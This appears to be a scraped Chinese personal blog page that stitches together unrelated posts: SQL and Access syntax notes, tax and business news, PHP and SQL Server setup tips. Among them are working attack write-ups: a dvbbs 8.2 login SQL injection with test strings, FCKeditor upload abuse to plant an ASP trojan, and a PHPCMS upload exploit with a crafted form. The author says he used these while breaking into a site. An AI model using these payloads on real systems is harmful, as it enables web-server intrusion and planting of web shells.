新建表：
create table [表名]
(
[自动编号字段] int IDENTITY (1,1) PRIMARY KEY ,
[字段1] nVarChar(50) default '默认值' null ,
[字段2] ntext null ,
[字段3] datetime,
[字段4] money null ,
[字段5] int default 0,
[字段6] Decimal (12,4) default 0,
[字段7] image null ,
)
删除表：
Drop table [表名]
插入数据：
INSERT INTO [表名] (字段1,字段2) VALUES (100,'51WINDOWS.NET')
删除数据：
DELETE FROM [表名] WHERE [字段名]>100
更新数据：
UPDATE [表名] SET [字段1] = 200,[字段2] = '51WINDOWS.NET' WHERE [字段三] = 'HAIWA'
新增字段：
ALTER TABLE [表名] ADD [字段名] NVARCHAR (50) NULL
删除字段：
ALTER TABLE [表名] DROP COLUMN [字段名]
修改字段：
ALTER TABLE [表名] ALTER COLUMN [字段名] NVARCHAR (50) NULL
重命名表：(Access 重命名表，请参考文章：在Access数据库中重命名表)
sp_rename '表名', '新表名', 'OBJECT'
新建约束：
ALTER TABLE [表名] ADD CONSTRAINT 约束名 CHECK ([约束字段] <= '2000-1-1')
删除约束：
ALTER TABLE [表名] DROP CONSTRAINT 约束名
新建默认值
ALTER TABLE [表名] ADD CONSTRAINT 默认值名 DEFAULT '51WINDOWS.NET' FOR [字段名]
删除默认值
ALTER TABLE [表名] DROP CONSTRAINT 默认值名
另外以上的只是SQL的语法在 ACCESS 下大部份也都是一样的
项一项查阅,并经自己使用验证,确认在access 数据库中添加自动编号字段使用以下方法比较合适: create table 数据表名称 (id counter constraint primarykey primary key) 需要注意的地方是:第二个primary中间有空格,另外,关键字不区分大小写. 另外自己最近发现的一种方法是: sql="create table mytb (id autoincrement(25,1) primary key,age int)" sql2="create table testtb (id autoincrement,age int,email char, primary key (id))" 其中在access中,autoincrement为自动编号类型字段,(25,1)分别为初始值及步长值,如果不写的话,默认是1,1,primary key指定了主键,以上示例,两种指定方法都可以

dvbbs8.2漏洞补下载地址:

http://bbs.dvbbs.net/dispbbs.asp?boardid=8&Id=1519564

紧急安全补丁0530
dvbbs8.2漏洞的产生

login.asp 这个文件的97行Function Dvbbs_ChkLogin 开始有以下代码：

username=trim(Dvbbs.CheckStr(request("username")))

而passport和username是用户输入的。

Public Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
CheckStr = Replace(Str,"'","''")
End Function

动网用Checkstr进行处理。

当我们输入111'，request("username")是111%27

Dvbbs.CheckStr(request("passport"))以后还是111%27
If ajaxPro Then username = unescape(username)

username就变成了111'

所以，'符号并没有过滤掉，漏洞就产生了。
------------------------------------------------
打开论坛，进行检测，先注册帐号lixiaopeng

lixiaopeng' and '1'='1 密码随意输入
提示为：用户名或者密码不正确.
lixiaopeng' and '1'='2 密码随意输入
提示为：本论坛不存在该用户名.

Read the rest of this entry

一,这个就是cn牛跟至尊版发现的那个.
asp/connector.asp

 http://[target]/[path]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
上传文件地址是UserFiles/all/1.asa
"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
type=xxx
所传的文件就到了http://[target]/[path]/UserFiles/xxx/下了
type=../
所传文件就到网站跟目录了.
二.
asp/connector.asp

 http://[target]/[path]/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
将找到的地址复制到IE地址栏中打开，出现一个上传文件管理页面，此时我们就可以上传我们的asp木马了，不过在上传之前我们需要将asp木马的后缀名改为asa，因为FCKeditor限制了asp文件的上传.

Read the rest of this entry

　　新浪科技讯 10月29日15:33消息，阿里巴巴(中国)网络技术有限公司(1688.HK，下称“阿里巴巴B2B”)刚刚证实，已于10月10日正式向百度发出通知函，终止广告发布合同，原因是该公司认为百度目前提供的搜索流量质量不高。

　　据悉，阿里巴巴B2B在百度的全部广告投放将于近期全部停止，这一举措被业内人士解读为阿里巴巴集团和百度公司之间的竞争升级。目前，这两家公司已在网络广告、搜索、C2C等业务领域有直接竞争关系。

　　早些年，阿里巴巴B2B一度依赖百度的关键字搜索为其中小企业客户带来巨大流量，但这种依赖程度随着双方竞争的加剧已日渐削弱。实际上，阿里巴巴集团下的淘宝在一年前就已屏蔽百度搜索，并停止在百度的广告投放。

　　阿里巴巴B2B公众与客户沟通部表示，阿里巴巴终止在百度上的广告投放完全基于效果的考虑。根据客户数据分析结果显示，百度的流量质量逐年下降，还存在相当比例来源不明的无效流量。同时，百度所带来的点击，与中小企业的需求不符合。

Read the rest of this entry

国家税务总局日前批复各地方税务局，个人通过网络买卖虚拟货币取得的收入将征收个人所得税。

批复指出，个人通过网络收购玩家的虚拟货币，加价后向他人出售取得的收入，属于个人所得税应税所得，应按照“财产转让所得”项目计算缴纳个人所得税。

个人销售虚拟货币的财产原值为其收购网络虚拟货币所支付的价款和相关税费。对于个人不能提供有关财产原值凭证的，由主管税务机关核定其财产原值。

北京地税局：卖虚拟货币收入税率固定为20%

本报讯(记者赵鹏)昨天记者致电北京市地税局，相关负责人透露，按照“财产转让所得”项目计算缴纳个人所得税的税率固定为20%，北京地税还将出台核定个人销售虚拟货币财产原值的相关办法。

据介绍，目前北京地税局尚未开始对个人通过网络销售虚拟货币取得的收入计征个人所得税。不过，该局意识到这种行为已经是一种较为常见的现象，应该对此加强管理。为了更好地执行国家税务总局这次公布的“关于个人通过网络买卖虚拟货币取得收入征收个人所得税问题的批复”的要求，北京地税局还将出台核定个人销售虚拟货币财产原值的相关操作办法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

漏洞文件: ads/upload.php、uppic.php 代码如下: 
require "common.php";
require PHPCMS_ROOT."/class/upload.php";
if(!$_userid) message("请您先登录或注册！" , PHPCMS_PATH."member/login.php");
if($extid==1) {
$upfile_type= "jpg|png|gif";
} elseif ($extid==2) {
$upfile_type= "swf";
}
if($action=='upload')
{
$fileArr = array(
'file'=>$uploadfile,
'name'=>$uploadfile_name,
'size'=>$uploadfile_size,
'type'=>$uploadfile_type
);
$showname= $fileArr['name'];
$tmpext=strtolower(fileext($showname));
$tmpfilesize=$fileArr['size'];
$savepath = 'ads/'.$upfile_dir.'/'.date('Ym');
$f->create(PHPCMS_ROOT."/".$savepath);
$up = new upload($fileArr,'',$savepath,$upfile_type,1,$upfile_size);
    ........... 
 
//很显然，upfile_type变量过滤不够严格，可以自定义上传类型,实践得知可以上传除*.php和*.php3的其它任意后缀的文件, 因为PHPCMS_ROOT."/class/upload.php"这个文件经过Zend加密,所以无法直接分析。
 
if(!$_userid) message("请您先登录或注册！" , PHPCMS_PATH."member/login.php");

$_userid是靠session获取的，所以注册个用户，登录后，开始利用漏洞,修改后的上传页面如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>上传</title>
<meta name="keywords" content="">
<meta name="description" content="">
<meta name="generator" content="Phpcms ">
<link href="/templates/default/skins/default/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<script language="javascript" type="text/javascript">
<!--
function checkform()
{
if(document.getElementById("uploadfile").value=='') { alert("请选择要上传的文件！"); return false;}
}
//-->
</script>
<table cellpadding="0" cellspacing="0" border="0" width="100%" height="5">
<tr>
    <td ></td>
</tr>
</table>
<form name="upload" method="post"
action="http://www.phpcms.cn/ads/upload.php?action=upload&url=&upfile_type=asp" enctype="multipart/form-data" onSubmit="return checkform();">
<table cellpadding="2" cellspacing="1" class="tableborder">
<tr>
<th>文件上传</th>
</tr>
<tr>
<td class="tablerow" height="30">
选择：<input name="uploadfile" type="file" id="uploadfile" size="20" />
<input type="hidden" name="MAX_FILE_SIZE" value="" />
<input type="hidden" name="channelid" value="0" />
<input type="submit" name="submit" value=" 上传 ">
</td>
</tr>
</table>
</form>
</body>
</html>
 
现在可以上传asp文件了，用登录后的窗口打开这个文件(保存session)，上传的文件名后缀跟form表单里action属性的upfile_type变量是一样的,上传后返回页面源代码如下: 
 
<script>
    var ctl_hurl=window.opener.document.getElementById("");
    var ctl_upbutten=window.opener.document.getElementById("upload");
ctl_hurl.value="ads/uploadfile/200612/20061206054522605.asp";
ctl_hurl.style.background="white";
self.close();
</script>

还有uppic.php也有同样漏洞，漏洞代码如下

1
2
3
4

include PHPCMS_ROOT."/class/upload.php";
$fileArr = array('file'=>$uploadfile,'name'=>$uploadfile_name,'size'=>$uploadfile_size,'type'=>$uploadfile_type);
$uploadfiletype = $uploadfiletype ? $uploadfiletype : $_PHPCMS['uploadfiletype'];
$savepath = $uploaddir ? $channeldir."/".$uploaddir."/".date("Ym")."/" : $_PHPCMS['uploaddir']."/".date("Ym")."/";

嘎嘎，晓鹏也是搞一个站的时候现用到网上找的漏洞，顺便记录一下，不过不巧的是上面的利用方法被补掉了，然后俺就通过了另一种方法实现了，虽然方法不同，但跟上面的漏洞关系还是蛮大的哇。暂时俺就不公告了，有兴趣的朋友可以留言和我讨论。

虽然是老洞了，不过有时还是能用到的，结合新的漏洞可能会出现意想不到的效果哦。

把PHP加入环境变量
解压php,本例是解压到"D:\php"...
右击"我的电脑"->"属性"->选择"高级"标签页->点击"环境变量"->点击下面"系统变量"列表内的"Path"->点击下面的"编辑"->在"变量值"最后处加上";D:\php"(php的解压路径,不要忘记先加上";" 号)->确定->点击"编辑"按钮前面的"新建"按钮->在"变量名"后输入"PHPRC"->"变量值"输入"D:\PHP" (PHP的解压路径)->点击"确定"完成...

在SQL Server Management Studio 用WINDOWS连接的情况下改实列的“属性”中“安全性”选中WINDOWS及SQL验证，再重起SQL服务器后，新建查询，执行下面代码

（几种不同的语句）

一、

ALTER LOGIN sa ENABLE ;

GO

ALTER LOGIN sa WITH PASSWORD = 'password' ;

GO

二、

ALTER LOGIN sa

WITH PASSWORD = N'新密码'

OLD_PASSWORD = N'旧密码'

三、

alter login [sa] with password=N'NewPassword'--旧密码可以不用提供

四、

sp_password 'OldPassword','NewPassword'

五、

USE test

go

EXEC sp_change_users_login 'Auto_Fix', '用户名', NULL, '密码'

--------在企业管理里—安全性—账号—右健属性(最好取消密码策略这项)

嘿嘿,看功夫状元的时候听到的,是片尾曲哦,不错.嘎
[audio:http://www.lixiaopeng.org/audio/taishihe.mp3]

　　信报讯(记者贺文华)记者昨天从国家税务总局官方网站获悉，纳税人从事互联网广告代理业务时，应按广告代理业务实际取得的收入计算缴纳营业税。

　　税总表示，委托广告发布单位制作并发布其承接的广告，无论该广告是通过何种媒体或载体(包括互联网)发布，无论委托广告发布单位是否具有工商行政管理部门颁发的广告经营许可证，纳税人都应该按照国家的相关规定，以其从事广告代理业务实际取得的收入为计税营业额计算缴纳营业税。